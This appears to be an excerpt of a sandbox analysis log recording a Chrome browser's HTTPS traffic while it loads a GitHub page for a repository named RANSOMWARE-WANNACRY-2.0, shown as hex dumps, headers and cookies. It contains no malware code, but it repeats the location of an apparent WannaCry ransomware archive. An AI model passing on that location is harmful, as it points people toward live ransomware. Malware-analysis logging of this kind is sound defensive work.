                                                                                      Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
                                                                                      2024-03-23 14:47:30 UTC1370INData Raw: 67 69 74 68 75 62 2d 31 39 63 38 35 62 65 34 61 66 39 63 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                                                                      Data Ascii: github-19c85be4af9c.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
                                                                                      2024-03-23 14:47:30 UTC1370INData Raw: 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61
                                                                                      Data Ascii: githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githuba
                                                                                      2024-03-23 14:47:30 UTC1370INData Raw: 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70
                                                                                      Data Ascii: er" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer="defer" typ
                                                                                      2024-03-23 14:47:30 UTC1370INData Raw: 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 66 62 34 62 38 64 34 30 66 32 30 36 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75
                                                                                      Data Ascii: type="application/javascript" src="https://github.githubassets.com/assets/element-registry-fb4b8d40f206.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modu
                                                                                      2024-03-23 14:47:30 UTC1370INData Raw: 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 39 35 62 38 34 65 65 36
                                                                                      Data Ascii: -72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6
                                                                                      2024-03-23 14:47:30 UTC1370INData Raw: 69 6e 63 6c 75 64 65 2d 34 36 37 37 35 34 2d 32 34 34 65 65 39 64 39 65 64 37 37 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74
                                                                                      Data Ascii: include-467754-244ee9d9ed77.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht
                                                                                      2024-03-23 14:47:30 UTC1370INData Raw: 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 2d 32 65 38 65 37 63 2d 61 35 38 64 37 63 31 31 65 38 35 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 42 6f 78 5f 42 6f 78 5f 6a 73 2d 38 66 38 63 35 65 32 61 32 63 62 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73
                                                                                      Data Ascii: rimer_react_lib-es-2e8e7c-a58d7c11e858.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-8f8c5e2a2cbf.js"></script><s


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      146192.168.2.1649862140.82.114.214436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:30 UTC793OUTPOST /github/collect HTTP/1.1
                                                                                      Host: collector.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 1166
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:30 UTC1166OUTData Raw: 7b 22 63 6c 69 65 6e 74 5f 69 64 22 3a 22 31 33 35 38 37 38 36 30 38 37 2e 31 37 31 31 32 30 35 32 34 30 22 2c 22 65 76 65 6e 74 73 22 3a 5b 7b 22 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 22 2c 22 74 69 74 6c 65 22 3a 22 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 20 61 74 20 6d 61 73 74 65 72 20 c2 b7 20 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 20 c2
                                                                                      Data Ascii: {"client_id":"1358786087.1711205240","events":[{"page":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip","title":"RANSOMWARE-WANNACRY-2.0/Ransomware.WannaCry.zip at master chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      2024-03-23 14:47:31 UTC578INHTTP/1.1 204 No Content
                                                                                      Date: Sat, 23 Mar 2024 14:47:31 GMT
                                                                                      access-control-allow-methods: POST,OPTIONS
                                                                                      access-control-allow-headers: Content-Type
                                                                                      access-control-allow-credentials: true
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: no-cache
                                                                                      X-Runtime: 0.087239
                                                                                      Strict-Transport-Security: max-age=631138519
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      x-download-options: noopen
                                                                                      x-permitted-cross-domain-policies: none
                                                                                      x-github-backend: Kubernetes
                                                                                      X-GitHub-Request-Id: 91B4:134F:25D893:64301A:65FEEB82
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      147192.168.2.1649866140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:30 UTC1285OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/latest-commit/master/Ransomware.WannaCry.zip HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: application/json
                                                                                      Accept: application/json
                                                                                      X-Requested-With: XMLHttpRequest
                                                                                      GitHub-Verified-Fetch: true
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      If-None-Match: W/"97c18cc82e71efdd5cf716e73ab1e4b4"
                                                                                      2024-03-23 14:47:31 UTC523INHTTP/1.1 304 Not Modified
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"97c18cc82e71efdd5cf716e73ab1e4b4"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:31 UTC2892INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      148192.168.2.1649867140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:30 UTC1289OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/deferred-metadata/master/Ransomware.WannaCry.zip HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: application/json
                                                                                      Accept: application/json
                                                                                      X-Requested-With: XMLHttpRequest
                                                                                      GitHub-Verified-Fetch: true
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      If-None-Match: W/"3ca1cb8ac06e96da0082e70bd7b7c408"
                                                                                      2024-03-23 14:47:31 UTC523INHTTP/1.1 304 Not Modified
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"3ca1cb8ac06e96da0082e70bd7b7c408"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:31 UTC2894INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      149192.168.2.1649863140.82.114.214436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:30 UTC793OUTPOST /github/collect HTTP/1.1
                                                                                      Host: collector.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 1132
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:30 UTC1132OUTData Raw: 7b 22 63 6c 69 65 6e 74 5f 69 64 22 3a 22 31 33 35 38 37 38 36 30 38 37 2e 31 37 31 31 32 30 35 32 34 30 22 2c 22 70 61 67 65 5f 76 69 65 77 73 22 3a 5b 7b 22 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 22 2c 22 74 69 74 6c 65 22 3a 22 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 20 61 74 20 6d 61 73 74 65 72 20 c2 b7 20 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32
                                                                                      Data Ascii: {"client_id":"1358786087.1711205240","page_views":[{"page":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip","title":"RANSOMWARE-WANNACRY-2.0/Ransomware.WannaCry.zip at master chronosmiki/RANSOMWARE-WANNACRY-2
                                                                                      2024-03-23 14:47:31 UTC578INHTTP/1.1 204 No Content
                                                                                      Date: Sat, 23 Mar 2024 14:47:31 GMT
                                                                                      access-control-allow-methods: POST,OPTIONS
                                                                                      access-control-allow-headers: Content-Type
                                                                                      access-control-allow-credentials: true
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: no-cache
                                                                                      X-Runtime: 0.001555
                                                                                      Strict-Transport-Security: max-age=631138519
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      x-download-options: noopen
                                                                                      x-permitted-cross-domain-policies: none
                                                                                      x-github-backend: Kubernetes
                                                                                      X-GitHub-Request-Id: 91BC:133E:1454EF:34FDED:65FEEB82
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      150192.168.2.1649865140.82.114.214436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:30 UTC793OUTPOST /github/collect HTTP/1.1
                                                                                      Host: collector.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 1117
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:30 UTC1117OUTData Raw: 7b 22 63 6c 69 65 6e 74 5f 69 64 22 3a 22 31 33 35 38 37 38 36 30 38 37 2e 31 37 31 31 32 30 35 32 34 30 22 2c 22 70 61 67 65 5f 76 69 65 77 73 22 3a 5b 7b 22 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 22 2c 22 74 69 74 6c 65 22 3a 22 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 20 61 74 20 6d 61 73 74 65 72 20 c2 b7 20 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32
                                                                                      Data Ascii: {"client_id":"1358786087.1711205240","page_views":[{"page":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip","title":"RANSOMWARE-WANNACRY-2.0/Ransomware.WannaCry.zip at master chronosmiki/RANSOMWARE-WANNACRY-2
                                                                                      2024-03-23 14:47:31 UTC580INHTTP/1.1 204 No Content
                                                                                      Date: Sat, 23 Mar 2024 14:47:31 GMT
                                                                                      access-control-allow-methods: POST,OPTIONS
